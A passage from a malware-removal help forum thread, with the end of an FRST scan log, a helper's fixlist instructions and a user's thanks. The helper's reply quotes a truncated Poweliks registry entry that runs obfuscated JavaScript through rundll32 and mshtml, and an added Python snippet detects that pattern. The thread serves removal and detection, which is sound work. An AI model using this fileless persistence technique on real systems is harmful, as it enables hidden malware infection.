2014-09-13 18:39 - 2014-08-18 17:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-13 18:39 - 2014-08-18 17:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-13 18:39 - 2014-08-18 17:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-13 18:39 - 2014-08-18 17:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-13 18:39 - 2014-08-18 17:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-13 18:39 - 2014-08-18 17:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-13 18:39 - 2014-08-18 17:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-13 18:39 - 2014-08-18 17:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-13 18:39 - 2014-08-18 17:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-13 18:39 - 2014-08-18 17:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-13 18:39 - 2014-08-18 17:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-13 18:39 - 2014-08-18 17:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-13 18:39 - 2014-08-18 17:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-13 18:39 - 2014-08-18 17:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-13 18:39 - 2014-08-18 17:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-13 18:39 - 2014-08-18 16:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-13 18:38 - 2014-08-19 13:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-13 18:38 - 2014-08-18 18:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-13 18:38 - 2014-08-18 18:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-13 18:38 - 2014-08-18 17:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-13 18:38 - 2014-08-18 17:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-13 18:38 - 2014-08-18 17:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-13 18:38 - 2014-08-18 16:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-13 18:38 - 2014-08-18 16:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-13 18:34 - 2014-06-26 21:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-10 21:02 - 2014-08-01 07:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-10 21:02 - 2014-06-23 22:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-09-02 14:26 - 2014-08-22 21:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-09-02 14:26 - 2014-08-22 20:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:51 - 2014-09-25 10:03 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:51 - 2014-09-22 18:54 - 00000000 ____D () C:\FRST
2014-09-25 10:50 - 2010-11-20 17:01 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:46 - 2014-09-22 15:21 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-25 10:46 - 2014-09-20 00:36 - 00002007 _____ () C:\Windows\setupact.log
2014-09-25 10:46 - 2013-08-25 22:02 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-25 10:46 - 2012-10-09 23:28 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 10:46 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-25 10:15 - 2012-10-09 22:42 - 01515758 _____ () C:\Windows\WindowsUpdate.log
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 10:03 - 2014-09-22 18:54 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-25 09:53 - 2014-09-25 09:50 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-25 00:17 - 2014-09-20 08:36 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-24 23:40 - 2014-09-24 23:41 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:50 - 2014-09-22 15:30 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-24 22:50 - 2014-09-22 15:30 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 08:49 - 2014-09-20 15:47 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-24 08:49 - 2012-10-09 23:14 - 00109280 _____ () C:\Users\Matts\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-24 08:49 - 2011-04-11 22:24 - 00000000 ____D () C:\Windows\CSC
2014-09-24 08:49 - 2009-07-14 00:33 - 00408000 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-24 01:19 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-09-24 00:10 - 2014-09-24 00:06 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 23:09 - 2009-07-13 22:04 - 00000855 _____ () C:\Windows\system32\Drivers\etc\hosts_bak_621
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2013-11-26 15:08 - 00000000 ____D () C:\ProgramData\Oracle
2014-09-23 22:44 - 2012-10-10 15:58 - 00000000 ____D () C:\Program Files\Java
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:33 - 2014-09-22 22:32 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:30 - 2014-09-20 15:30 - 00000000 ____D () C:\AdwCleaner
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:29 - 2014-09-22 21:28 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:14 - 2014-09-22 21:05 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:52 - 2014-09-14 18:19 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 20:07 - 2014-09-14 20:35 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-22 20:07 - 2014-09-14 20:34 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-22 19:55 - 2014-09-22 19:54 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:55 - 2014-09-14 18:19 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:22 - 2012-10-09 22:51 - 00000000 ____D () C:\Users\Matts
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-22 02:41 - 2012-10-09 22:57 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-21 19:08 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 19:08 - 2014-09-21 17:00 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 19:03 - 2012-10-10 18:18 - 00000000 ____D () C:\Users\Matts\AppData\Local\Deployment
2014-09-21 19:02 - 2014-09-21 17:00 - 00000000 ____D () C:\temp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:50 - 2014-09-21 18:48 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:48 - 2013-10-28 10:27 - 00000000 ____D () C:\Program Files\InstallShield Installation Information
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:40 - 2014-09-21 17:15 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-21 16:44 - 2012-10-09 22:51 - 00000000 __SHD () C:\Recovery
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-20 00:36 - 2009-07-14 00:53 - 00032580 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-19 23:54 - 2014-09-19 23:26 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-19 21:42 - 2012-10-10 02:35 - 00000000 ____D () C:\Windows\Panther
2014-09-19 20:06 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-09-19 19:18 - 2012-10-10 13:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-19 19:18 - 2012-10-10 13:33 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-14 19:30 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:51 - 2013-01-08 12:23 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-14 18:35 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\addins
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2012-10-10 15:18 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-14 18:07 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-11 23:08 - 2013-07-18 09:36 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-11 23:08 - 2012-10-17 21:06 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-11 23:08 - 2012-10-09 23:14 - 00002117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2014-09-11 23:08 - 2012-10-09 23:14 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-09-11 23:08 - 2012-10-09 23:14 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-09-09 17:47 - 2014-09-24 09:36 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-09-19 19:59

==================== End Of Log ============================

 

Thank you,

 

Brian


Edited by bcv15, 25 September 2014 - 09:11 PM.


#4 Elise

Elise

    Bleepin' Blonde


  • Malware Study Hall Admin
  • 61,207 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Romania
  • Local time:04:04 AM

Posted 26 September 2014 - 02:56 AM

Hi Brian,

Good news, the infection shows just fine in FRST. :)

 

Please press Windows key + R, type notepad and press enter.

Copy/paste the following text into Notepad.

HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Save the file as fixlist.txt in the same location as FRST.

Now rerun FRST and click the Fix button. Post the resulting log, restart your computer and let me know if you still have the problems with dllhost.exe.


regards, Elise


"Now faith is the substance of things hoped for, the evidence of things not seen."


Malware analyst @ Emsisoft
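
The entry flagged in the reply above has a recognisable shape: a COM server value (localserver32) whose command is rundll32.exe handed a javascript: pseudo-protocol and mshtml's RunHTMLApplication entry point. The following is an added example, not part of the original thread and not FRST's own logic: a Python check that screens FRST-style lines for that shape. The sample log lines, SIDs and CLSIDs are constructed placeholders, and the severity labels are this example's own convention.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Registry values that name the command or DLL started for a COM class.
COM_SERVER_VALUES = ("localserver32", "inprocserver32")

# rundll32 handed a script pseudo-protocol where "<dll>,<export>" is expected.
SCRIPT_VIA_RUNDLL32 = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?:javascript|vbscript):', re.IGNORECASE)
# The mshtml export named in the fixlist line quoted in the thread.
RUN_HTML_APP = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.IGNORECASE)
# FRST's note that it cut an oversized data entry short.
TRUNCATED = re.compile(r"data entry has (\d+) more characters", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    key: str
    severity: str                      # "high" or "medium" (example's own labels)
    reasons: List[str] = field(default_factory=list)
    hidden_chars: int = 0              # characters FRST did not print


def split_entry(line: str) -> Tuple[str, str]:
    """Split 'KEY: DATA' on the first ': '; a line without it is all data."""
    key, sep, data = line.partition(": ")
    return (key.strip(), data) if sep else ("", line)


def classify(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding if the line matches the script-via-rundll32 shape."""
    key, data = split_entry(line)
    reasons = []
    if SCRIPT_VIA_RUNDLL32.search(data):
        reasons.append("rundll32 given a script pseudo-protocol instead of a DLL")
    if RUN_HTML_APP.search(data):
        reasons.append("mshtml,RunHTMLApplication entry point")
    if not reasons:
        return None  # ordinary rundll32 use or unrelated line

    severity = "medium"
    if key.lower().endswith(COM_SERVER_VALUES):
        # The command runs whenever something instantiates the COM class.
        reasons.append("registered as a COM server command")
        severity = "high"
    if key.upper().startswith(("HKU\\", "HKCU\\")):
        reasons.append("per-user hive")
    m = TRUNCATED.search(data)
    return Finding(line_no, key, severity, reasons, int(m.group(1)) if m else 0)


def scan(lines) -> List[Finding]:
    """Classify every line; line numbers are 1-based."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = classify(n, line)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample in FRST's line format; every identifier is a placeholder.
SAMPLE_LOG = r"""
BHO: Example Helper -> {00000000-0000-0000-0000-000000000001} -> C:\Program Files\Example\helper.dll (Example Corp.)
HKLM\...\Run: [ExampleTray] => rundll32.exe C:\Windows\system32\example.dll,TrayEntry
HKU\S-1-5-21-0-0-0-1000\...\{00000000-0000-0000-0000-000000000002}\localserver32: C:\Program Files\Example\server.exe
HKU\S-1-5-21-0-0-0-1000\...\{00000000-0000-0000-0000-000000000003}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<payload elided> (the data entry has 239 more characters).
R2 ExampleSvc; C:\Program Files\Example\svc.exe [1000 2014-01-01] (Example Corp.)
C:\Windows\explorer.exe => File is digitally signed
""".strip().splitlines()


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} [{f.severity}] {f.key}")
        for reason in f.reasons:
            print(f"    - {reason}")
        if f.hidden_chars:
            print(f"    - {f.hidden_chars} characters of data not shown in the log")
```

Only the fourth sample line is reported; the ordinary rundll32 Run entry and the localserver32 value pointing at an executable pass through unflagged.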


#5 bcv15


Posted 26 September 2014 - 03:56 PM

So far so GOOD!!

 

Thank you so much Elise!!

I'll check in the next couple of days for any update!

 

My daughter has been busting my chops to get her computer back, heheheh.

 

Thank you and your whole team for all the help you do for people!!

 

Brian



#6 Elise


Posted 27 September 2014 - 02:09 AM

Hi Brian, I'm glad to hear that!

Can you please rerun DDS once more, check the option "attach.txt" and click scan? Post the resulting attach.txt (no need for dds.txt).


regards, Elise

